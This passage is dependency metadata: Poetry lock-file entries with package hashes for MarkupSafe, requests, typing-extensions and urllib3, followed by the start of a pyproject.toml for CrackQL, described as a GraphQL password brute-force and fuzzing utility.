"MarkupSafe-2.0.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2d7d807855b419fc2ed3e631034685db6079889a1f01d5d9dac950f764da3dad"}, 127 | {file = "MarkupSafe-2.0.1-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:add36cb2dbb8b736611303cd3bfcee00afd96471b09cda130da3581cbdc56a6d"}, 128 | {file = "MarkupSafe-2.0.1-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:168cd0a3642de83558a5153c8bd34f175a9a6e7f6dc6384b9655d2697312a646"}, 129 | {file = "MarkupSafe-2.0.1-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:4dc8f9fb58f7364b63fd9f85013b780ef83c11857ae79f2feda41e270468dd9b"}, 130 | {file = "MarkupSafe-2.0.1-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:20dca64a3ef2d6e4d5d615a3fd418ad3bde77a47ec8a23d984a12b5b4c74491a"}, 131 | {file = "MarkupSafe-2.0.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:cdfba22ea2f0029c9261a4bd07e830a8da012291fbe44dc794e488b6c9bb353a"}, 132 | {file = "MarkupSafe-2.0.1-cp310-cp310-win32.whl", hash = "sha256:99df47edb6bda1249d3e80fdabb1dab8c08ef3975f69aed437cb69d0a5de1e28"}, 
133 | {file = "MarkupSafe-2.0.1-cp310-cp310-win_amd64.whl", hash = "sha256:e0f138900af21926a02425cf736db95be9f4af72ba1bb21453432a07f6082134"}, 134 | {file = "MarkupSafe-2.0.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:f9081981fe268bd86831e5c75f7de206ef275defcb82bc70740ae6dc507aee51"}, 135 | {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux1_i686.whl", hash = "sha256:0955295dd5eec6cb6cc2fe1698f4c6d84af2e92de33fbcac4111913cd100a6ff"}, 136 | {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:0446679737af14f45767963a1a9ef7620189912317d095f2d9ffa183a4d25d2b"}, 137 | {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux2010_i686.whl", hash = "sha256:f826e31d18b516f653fe296d967d700fddad5901ae07c622bb3705955e1faa94"}, 138 | {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux2010_x86_64.whl", hash = "sha256:fa130dd50c57d53368c9d59395cb5526eda596d3ffe36666cd81a44d56e48872"}, 139 | {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux2014_aarch64.whl", hash = "sha256:905fec760bd2fa1388bb5b489ee8ee5f7291d692638ea5f67982d968366bef9f"}, 140 | {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bf5d821ffabf0ef3533c39c518f3357b171a1651c1ff6827325e4489b0e46c3c"}, 141 | {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:0d4b31cc67ab36e3392bbf3862cfbadac3db12bdd8b02a2731f509ed5b829724"}, 142 | {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:baa1a4e8f868845af802979fcdbf0bb11f94f1cb7ced4c4b8a351bb60d108145"}, 143 | {file = "MarkupSafe-2.0.1-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:deb993cacb280823246a026e3b2d81c493c53de6acfd5e6bfe31ab3402bb37dd"}, 144 | {file = "MarkupSafe-2.0.1-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:63f3268ba69ace99cab4e3e3b5840b03340efed0948ab8f78d2fd87ee5442a4f"}, 145 | {file = "MarkupSafe-2.0.1-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:8d206346619592c6200148b01a2142798c989edcb9c896f9ac9722a99d4e77e6"}, 146 | {file = "MarkupSafe-2.0.1-cp36-cp36m-win32.whl", hash = "sha256:6c4ca60fa24e85fe25b912b01e62cb969d69a23a5d5867682dd3e80b5b02581d"}, 147 | {file = "MarkupSafe-2.0.1-cp36-cp36m-win_amd64.whl", hash = "sha256:b2f4bf27480f5e5e8ce285a8c8fd176c0b03e93dcc6646477d4630e83440c6a9"}, 148 | {file = "MarkupSafe-2.0.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:0717a7390a68be14b8c793ba258e075c6f4ca819f15edfc2a3a027c823718567"}, 149 | {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:6557b31b5e2c9ddf0de32a691f2312a32f77cd7681d8af66c2692efdbef84c18"}, 150 | {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:49e3ceeabbfb9d66c3aef5af3a60cc43b85c33df25ce03d0031a608b0a8b2e3f"}, 151 | {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux2010_i686.whl", hash = "sha256:d7f9850398e85aba693bb640262d3611788b1f29a79f0c93c565694658f4071f"}, 152 | {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux2010_x86_64.whl", hash = "sha256:6a7fae0dd14cf60ad5ff42baa2e95727c3d81ded453457771d02b7d2b3f9c0c2"}, 153 | {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:b7f2d075102dc8c794cbde1947378051c4e5180d52d276987b8d28a3bd58c17d"}, 154 | {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e9936f0b261d4df76ad22f8fee3ae83b60d7c3e871292cd42f40b81b70afae85"}, 155 | {file = 
"MarkupSafe-2.0.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:2a7d351cbd8cfeb19ca00de495e224dea7e7d919659c2841bbb7f420ad03e2d6"}, 156 | {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:60bf42e36abfaf9aff1f50f52644b336d4f0a3fd6d8a60ca0d054ac9f713a864"}, 157 | {file = "MarkupSafe-2.0.1-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:d6c7ebd4e944c85e2c3421e612a7057a2f48d478d79e61800d81468a8d842207"}, 158 | {file = "MarkupSafe-2.0.1-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:f0567c4dc99f264f49fe27da5f735f414c4e7e7dd850cfd8e69f0862d7c74ea9"}, 159 | {file = "MarkupSafe-2.0.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:89c687013cb1cd489a0f0ac24febe8c7a666e6e221b783e53ac50ebf68e45d86"}, 160 | {file = "MarkupSafe-2.0.1-cp37-cp37m-win32.whl", hash = "sha256:a30e67a65b53ea0a5e62fe23682cfe22712e01f453b95233b25502f7c61cb415"}, 161 | {file = "MarkupSafe-2.0.1-cp37-cp37m-win_amd64.whl", hash = "sha256:611d1ad9a4288cf3e3c16014564df047fe08410e628f89805e475368bd304914"}, 162 | {file = "MarkupSafe-2.0.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:5bb28c636d87e840583ee3adeb78172efc47c8b26127267f54a9c0ec251d41a9"}, 163 | {file = "MarkupSafe-2.0.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:be98f628055368795d818ebf93da628541e10b75b41c559fdf36d104c5787066"}, 164 | {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux1_i686.whl", hash = "sha256:1d609f577dc6e1aa17d746f8bd3c31aa4d258f4070d61b2aa5c4166c1539de35"}, 165 | {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:7d91275b0245b1da4d4cfa07e0faedd5b0812efc15b702576d103293e252af1b"}, 166 | {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux2010_i686.whl", hash = "sha256:01a9b8ea66f1658938f65b93a85ebe8bc016e6769611be228d797c9d998dd298"}, 167 | {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux2010_x86_64.whl", hash = "sha256:47ab1e7b91c098ab893b828deafa1203de86d0bc6ab587b160f78fe6c4011f75"}, 168 | {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:97383d78eb34da7e1fa37dd273c20ad4320929af65d156e35a5e2d89566d9dfb"}, 169 | {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6fcf051089389abe060c9cd7caa212c707e58153afa2c649f00346ce6d260f1b"}, 170 | {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:5855f8438a7d1d458206a2466bf82b0f104a3724bf96a1c781ab731e4201731a"}, 171 | {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:3dd007d54ee88b46be476e293f48c85048603f5f516008bee124ddd891398ed6"}, 172 | {file = "MarkupSafe-2.0.1-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:aca6377c0cb8a8253e493c6b451565ac77e98c2951c45f913e0b52facdcff83f"}, 173 | {file = "MarkupSafe-2.0.1-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:04635854b943835a6ea959e948d19dcd311762c5c0c6e1f0e16ee57022669194"}, 174 | {file = "MarkupSafe-2.0.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:6300b8454aa6930a24b9618fbb54b5a68135092bc666f7b06901f897fa5c2fee"}, 175 | {file = "MarkupSafe-2.0.1-cp38-cp38-win32.whl", hash = "sha256:023cb26ec21ece8dc3907c0e8320058b2e0cb3c55cf9564da612bc325bed5e64"}, 176 | {file = "MarkupSafe-2.0.1-cp38-cp38-win_amd64.whl", hash = "sha256:984d76483eb32f1bcb536dc27e4ad56bba4baa70be32fa87152832cdd9db0833"}, 177 | {file = 
"MarkupSafe-2.0.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:2ef54abee730b502252bcdf31b10dacb0a416229b72c18b19e24a4509f273d26"}, 178 | {file = "MarkupSafe-2.0.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:3c112550557578c26af18a1ccc9e090bfe03832ae994343cfdacd287db6a6ae7"}, 179 | {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux1_i686.whl", hash = "sha256:53edb4da6925ad13c07b6d26c2a852bd81e364f95301c66e930ab2aef5b5ddd8"}, 180 | {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:f5653a225f31e113b152e56f154ccbe59eeb1c7487b39b9d9f9cdb58e6c79dc5"}, 181 | {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux2010_i686.whl", hash = "sha256:4efca8f86c54b22348a5467704e3fec767b2db12fc39c6d963168ab1d3fc9135"}, 182 | {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux2010_x86_64.whl", hash = "sha256:ab3ef638ace319fa26553db0624c4699e31a28bb2a835c5faca8f8acf6a5a902"}, 183 | {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:f8ba0e8349a38d3001fae7eadded3f6606f0da5d748ee53cc1dab1d6527b9509"}, 184 | {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c47adbc92fc1bb2b3274c4b3a43ae0e4573d9fbff4f54cd484555edbf030baf1"}, 185 | {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:37205cac2a79194e3750b0af2a5720d95f786a55ce7df90c3af697bfa100eaac"}, 186 | {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:1f2ade76b9903f39aa442b4aadd2177decb66525062db244b35d71d0ee8599b6"}, 187 | {file = "MarkupSafe-2.0.1-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:4296f2b1ce8c86a6aea78613c34bb1a672ea0e3de9c6ba08a960efe0b0a09047"}, 188 | {file = "MarkupSafe-2.0.1-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:9f02365d4e99430a12647f09b6cc8bab61a6564363f313126f775eb4f6ef798e"}, 189 | {file = "MarkupSafe-2.0.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:5b6d930f030f8ed98e3e6c98ffa0652bdb82601e7a016ec2ab5d7ff23baa78d1"}, 190 | {file = "MarkupSafe-2.0.1-cp39-cp39-win32.whl", hash = "sha256:10f82115e21dc0dfec9ab5c0223652f7197feb168c940f3ef61563fc2d6beb74"}, 191 | {file = "MarkupSafe-2.0.1-cp39-cp39-win_amd64.whl", hash = "sha256:693ce3f9e70a6cf7d2fb9e6c9d8b204b6b39897a2c4a1aa65728d5ac97dcc1d8"}, 192 | {file = "MarkupSafe-2.0.1.tar.gz", hash = "sha256:594c67807fb16238b30c44bdf74f36c02cdf22d1c8cda91ef8a0ed8dabf5620a"}, 193 | ] 194 | requests = [ 195 | {file = "requests-2.27.1-py2.py3-none-any.whl", hash = "sha256:f22fa1e554c9ddfd16e6e41ac79759e17be9e492b3587efa038054674760e72d"}, 196 | {file = "requests-2.27.1.tar.gz", hash = "sha256:68d7c56fd5a8999887728ef304a6d12edc7be74f1cfa47714fc8b414525c9a61"}, 197 | ] 198 | typing-extensions = [ 199 | {file = "typing_extensions-4.1.1-py3-none-any.whl", hash = "sha256:21c85e0fe4b9a155d0799430b0ad741cdce7e359660ccbd8b530613e8df88ce2"}, 200 | {file = "typing_extensions-4.1.1.tar.gz", hash = "sha256:1a9462dcc3347a79b1f1c0271fbe79e844580bb598bafa1ed208b94da3cdcd42"}, 201 | ] 202 | urllib3 = [ 203 | {file = "urllib3-1.26.11-py2.py3-none-any.whl", hash = "sha256:c33ccba33c819596124764c23a97d25f32b28433ba0dedeb77d873a38722c9bc"}, 204 | {file = "urllib3-1.26.11.tar.gz", hash = "sha256:ea6e8fb210b19d950fab93b60c9009226c63a28808bc8386e05301e25883ac0a"}, 205 | ] 206 | -------------------------------------------------------------------------------- /pyproject.toml: 
-------------------------------------------------------------------------------- 1 | [tool.poetry] 2 | name = "CrackQL" 3 | version = "1.0" 4 | description = "CrackQL is a GraphQL password brute-force and fuzzing utility." 5 | authors = ["Nick Aleks